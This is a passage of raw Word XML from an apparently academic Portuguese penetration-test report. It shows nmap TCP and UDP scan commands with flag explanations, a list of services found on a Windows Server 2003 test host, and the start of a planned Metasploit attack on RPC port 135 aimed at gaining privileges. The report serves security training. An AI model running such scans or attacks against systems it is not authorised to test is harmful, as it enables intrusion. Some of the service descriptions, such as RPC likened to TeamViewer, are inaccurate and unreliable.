          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82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530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Microsoft Windows microsoft-ds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- Ferramenta que auxilia a implantação de imagens em</w:t>
      </w:r>
      <w:r w:rsidR="00BF5785" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Apache httpd</w:t>
      </w:r>
      <w:r w:rsidR="00BF5785" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Servidor Web;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Microsoft Windows 98 netbios-ssn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– Api que fornece serviços relacionados com a camada de T</w:t>
      </w:r>
      <w:r w:rsidR="00185ED4" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a co</w:t>
      </w:r>
      <w:r w:rsidR="00BF5785" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>municação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877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Microsoft Firmware Ppt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– Protocolo de transferência ponto a ponto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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30877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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C624EB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1248B1EF" wp14:editId="09DEDFB1">
            <wp:extent cx="5400040" cy="375856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8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Figura 8 - Rota traçada pelo Tracerouter - Parte 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B700D" w:rsidRDefault="006B700D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B700D" w:rsidRDefault="006B700D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F15F82" w:rsidRDefault="00A83EB9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Varredura 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6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D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Utilização do comando nmap -sV -p 1-65535 -O IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00831A3E" w:rsidRPr="00F15F82" w:rsidRDefault="00831A3E" w:rsidP="006B700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“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>nmap” executa a ferramenta Nmap</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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“-sV” permite que a ferramenta realize o SYN</w:t>
      </w:r>
      <w:r w:rsidR="003D23F9" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e busque a versão do software </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rodando no momento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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“-p” indica quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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“-O” permite que a ferramenta tente encontrar o </w:t>
      </w:r>
      <w:r w:rsidR="00B3361B" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sistema operacional utilizado pelo servidor</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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IP_do_servidor é o IP onde está hospedada a aplicação em teste.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178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pP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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas abertas e a versão dos serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRPr="00F15F82" w:rsidRDefault="003178EE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highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F79D1" w:rsidRDefault="005967D5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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003178EE" w:rsidRDefault="003178EE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 xml:space="preserve">De acordo com a figura 9, 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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.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</w:t>
      </w:r>
      <w:r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>Também foi possível descobrir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as portas abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F79D1" w:rsidRPr="00F15F82" w:rsidRDefault="005F79D1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 wp14:anchorId="46382FD0" wp14:editId="748F2656">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>62865</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220345</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5676900" cy="3851275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21475"/>
                <wp:lineTo x="21528" y="21475"/>
                <wp:lineTo x="21528" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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9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D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B" w:rsidP="00F3154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Figura 9 - Versão do software rodando nas portas escaneadas</w:t>
      </w:r>
      <w:r w:rsidR="003178EE"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530877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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ab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="0053087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AA00BE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Serviços </w:t>
      </w:r>
      <w:r w:rsidR="003178EE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e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ncontrados na figura </w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9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530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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30877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows RPC</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta semelhante ao TeamViewer que conecta o computador criando um esquema de servidor - cliente; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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30877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows microsoft-ds</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Ferramenta que auxilia a implantação de imag</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ens em uma distribuição Windows;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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30877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache httpd</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Servidor Web;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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30877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Windows 98 netbios-ssn</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Api que fornece serviços relacionados com a camada de T</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ansporte do modelo OSI para permitir a co</w:t>
      </w:r>
      <w:r w:rsidR="002B1EF3" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>municação de aplicativos locais;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00AA00BE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30877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Microsoft Firmware Ppt</w:t>
      </w:r>
      <w:r w:rsidR="00530877" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Protocolo de transferência ponto a ponto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00530877" w:rsidRPr="00F15F82" w:rsidRDefault="00530877" w:rsidP="00F3154F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A83EB9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7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00935C82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Utilização do comando nmap -sU -p 1-65535 IP_do_servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700D">
      <w:p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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AF248B" w:rsidRPr="00F15F82" w:rsidRDefault="00AF248B" w:rsidP="006B700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“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>nmap” executa a ferramenta Nmap</w:t>
      </w:r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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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“-sU” permite que a ferramenta use o detector de portas UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00184BA7" w:rsidRPr="006B700D" w:rsidRDefault="00184BA7" w:rsidP="006B700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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B700D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006B700D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>-p” indica quais portas devem ser usadas no teste, o delimitador é “-”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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“-O” permite que a ferramenta tente encontrar o sistema operacional </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>utilizado pelo servidor</w:t>
      </w:r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FE6FEB" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="006B700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5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IP_do_servidor é o IP onde está hospedada a aplicação em teste.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C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25" w:rsidP="00F3154F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25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  <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pP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>Espera-se descobrir o sistema operacional utilizado pelo servidor explorado, as portas UDP abertas e a versão e os serviços que estão rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="009C3F25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highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00240857" w:rsidRDefault="005967D5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  <w:highlight w:val="cyan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  <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Relatório de execução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C3F25" w:rsidRPr="00F15F82" w:rsidRDefault="00184BA7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>De acordo com a figura 10</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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 xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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foi possível descobrir o sistema operacional utilizado pelo servidor explorado: </w:t>
      </w:r>
      <w:r w:rsidR="009C3F25" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Windows Server 2003.</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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>Também foi possível descobrir</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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as portas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UDP</w:t>
      </w:r>
      <w:r w:rsidR="009C3F25"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abertas e a versão dos serviços que estavam rodando nessas portas no momento do escaneamento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B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9264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32BEA109" wp14:editId="5634B068">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>72390</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-52070</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5705475" cy="4083685"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21462"/>
                <wp:lineTo x="21564" y="21462"/>
                <wp:lineTo x="21564" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight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0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Figura 10 - Versão do software rodando nas portas UDP escaneadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00F15F82" w:rsidRDefault="00EC5D2B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66072" w:rsidRPr="00F15F82" w:rsidRDefault="00477883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rviços encontrados na figura 10</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072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netbios-ns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- responsável pelo registro de nomes de aplicação do NetBios [4]; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072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netbios -dgm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- serviço de datagrams do NetBios ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072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snmp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[5] - gerenciamento de redes;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A66072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microsoft-ds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- protocolo windows para compartilhamento e impressões de arquivos; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00915C31" w:rsidRPr="00F15F82" w:rsidRDefault="00915C31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L2TP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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Protocolo de Encapsulamento de Camada 2)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[11] – Protocolo de encapsulamento da Internet, utilizado por uma conexão de VPN (rede virtual privada) para acessar uma rede privada;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00967B9F" w:rsidRPr="00F15F82" w:rsidRDefault="00477883" w:rsidP="0047788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55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A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nat-t-like</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - protocolo de tradução de ips.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRDefault="00477883" w:rsidP="0047788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55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A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ntp</w:t>
      </w:r>
      <w:r w:rsidR="00A66072" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> [3] - protocolo de sincronização de relógios usando </w:t>
      </w:r>
      <w:r w:rsidR="00967B9F" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidR="00240857">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3154F" w:rsidRPr="00F15F82" w:rsidRDefault="00F3154F" w:rsidP="00F3154F">
      <w:p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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A66072" w:rsidRPr="00F15F82" w:rsidRDefault="00A6607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902307" w:rsidRDefault="00902307" w:rsidP="009023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4.3.2.2 </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Ataque à porta RPC - via </w:t>
      </w:r>
      <w:r w:rsidR="00FE6FEB" w:rsidRPr="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00AC10DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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Tarefa realizada dia 10/04/16.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82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: 1 hora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Ataque à porta RPC descoberta na análise de servidor via Nmap realizada anteriormente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Tentar se conectar à porta 135 usando o framework Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, ferramenta abordada no subcapítulo 3.2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para tentar conseguir privilégios dentro do Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="009023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1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00902307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Tentar configurar algum exploit </w:t>
      </w:r>
      <w:r w:rsidR="00902307">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>para atacar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a porta 135.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5967D5" w:rsidP="00902307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A ferramenta </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>é de difícil configuração e possui</w:t>
      </w:r>
